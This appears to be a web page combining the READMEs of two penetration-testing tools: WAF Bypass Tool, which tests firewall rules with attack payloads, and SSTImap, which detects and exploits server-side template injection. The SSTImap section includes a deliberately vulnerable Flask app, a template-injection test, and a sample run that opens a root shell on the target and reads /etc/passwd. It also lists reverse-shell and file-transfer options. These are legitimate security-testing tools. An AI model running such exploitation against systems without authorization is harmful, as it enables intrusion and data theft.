WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.
The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:
# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'
# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'
'--proxy'
(--proxy='http://proxy.example.com:3128'
) - option allows to specify where to connect to instead of the host.
'--header'
(--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF'
) - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.
'--user-agent'
(--user-agent 'MyUserAgent 1/1'
) - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT"
).
'--block-code'
(--block-code='403' --block-code='222'
) - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403
). Multiple use is allowed.
'--threads'
(--threads=15
) - option allows to specify the number of parallel scan threads (default is 10
).
'--timeout'
(--timeout=10
) - option allows to specify a request processing timeout in sec. (default is 30
).
'--json-format'
- an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).
'--details'
- display the False Positive and False Negative payloads. Not available in JSON
format.
'--exclude-dir'
- exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'
). Multiple use is allowed.
Depending on the purpose, payloads are located in the appropriate folders:
When compiling a payload, the following zones, method and options are used:
Base64
, HTML-ENTITY
, UTF-16
) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16
). Applicable only to for ARGS
, BODY
, COOKIE
and HEADER
zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON
.Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).
For the zones you can use %RND%
suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload
or param=%RND%
OR A%RND%B
)
You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.
API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'
.
For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY
(required) and BOUNDARY
(optional). If BOUNDARY
is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...'
).
If a BOUNDARY
is specified, then the content of the BODY
must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY
a separated by BOUNDARY
.
Other zones are allowed in this directory (e.g.: URL
, ARGS
etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...'
will be added to all requests.
ย
SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.
This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.
Sandbox break-out techniques came from:
This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.
Even though this software is based on Tplmap's code, backwards compatibility is not provided.
-i
) allowing for easier exploitation and detection-x
) or single command (-X
) execution{php}{/php}
. Old payload is available as Smarty_unsecure
.-A
-V
-h
for helpThis is an example of a simple website written in Python using Flask framework and Jinja2 template engine. It integrates user-supplied variable name
in an unsafe way, as it is concatenated to the template string before rendering.
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
# SSTI VULNERABILITY:
template = f"Hello, {name}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
Not only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.
$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix
User-supplied input should be introduced in a safe way through rendering context:
from flask import Flask, request, render_template_string
import os
app = Flask(__name__)
@app.route("/page")
def page():
name = request.args.get('name', 'World')
template = "Hello, {{name}}!<br>\n" \
"OS type: {{os}}"
return render_template_string(template, name=name, os=os.name)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80)
SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.
After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.
To check the URL, you can use -u
argument:
$ ./sstimap.py -u https://example.com/page?name=John
โโโโโโโโฆโโโโโโโฆโโโโโโโโ โโโ
โ โโโโโโฃ โโโโโโฉโโโ โโโโโโโโโ
โ โโโโโโฃ โโโโโโ โ โ โ{โ _ __ ___ __ _ _ __
โโโโโโ โ โโโโโ โ โ โ โ*โ | '_ ` _ \ / _` | '_ \
โโโโโโ โ โโโโโ โ โ โ โ}โ | | | | | | (_| | |_) |
โโโโโโโโโโโโโโโ โโโ โโฆโ |_| |_| |_|\__,_| .__/
โ | |
|_|
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2
Injecti on: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
Use --os-shell
option to launch a pseudo-terminal on the target.
$ ./sstimap.py -u https://example.com/page?name=John --os-shell
โโโโโโโโฆโโโโโโโฆโโโโโโโโ โโโ
โ โโโโโโฃ โโโโโโฉโโโ โโโโโโโโโ
โ โโโโโโฃ โโโโโโ โ โ โ{โ _ __ ___ __ _ _ __
โโโโโโ โ โโโโโ โ โ โ โ*โ | '_ ` _ \ / _` | '_ \
โโโโโโ โ โโโโโ โ โ โ โ}โ | | | | | | (_| | |_) |
โโโโโโโโฉโโโโโโโ โโโ โโฆโ |_| |_| |_|\__,_| .__/
โ | |
|_|
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
To get a full list of options, use --help
argument.
In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i
argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.
Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u
argument or url
command. After that, you can use run
command to check URL for SSTI.
If SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use Ctrl+C
to abort them without stopping a program.
By the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.
To get a full list of interactive commands, use command help
in interactive mode.
SSTImap supports multiple template engines and eval()-like injections.
New payloads are welcome in PRs.
Engine | RCE | Blind | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | โ | โ | Python | โ | โ |
Jinja2 | โ | โ | Python | โ | โ |
Python (code eval) | โ | โ | Python | โ | โ |
Tornado | โ | โ | Python | โ | โ |
Nunjucks | โ | โ | JavaScript | โ | โ |
Pug | โ | โ | JavaScript | โ | โ |
doT | โ | โ | JavaScript | โ | โ |
Marko | โ | โ | JavaScript | โ | โ |
JavaScript (code eval) | โ | โ | JavaScript | โ | โ |
Dust (<= dustjs-helpers@1.5.0) | โ | โ | JavaScript | โ | โ |
EJS | โ | โ | JavaScript | โ | โ |
Ruby (code eval) | โ | โ | Ruby | โ | โ |
Slim | โ | โ | Ruby | โ | โ |
ERB | โ | โ | Ruby | โ | โ |
Smarty (unsecured) | โ | โ | PHP | โ | โ |
Smarty (secured) | โ | โ | PHP | โ | โ |
PHP (code eval) | โ | โ | PHP | โ | โ |
Twig (<=1.19) | โ | โ | PHP | โ | โ |
Freemarker | โ | โ | Java | โ | โ |
Velocity | โ | โ | Java | โ | โ |
Twig (>1.19) | ร | ร | ร | ร | ร |
Dust (> dustjs-helpers@1.5.0) | ร | ร | ร | ร | ร |
Currently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.
If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.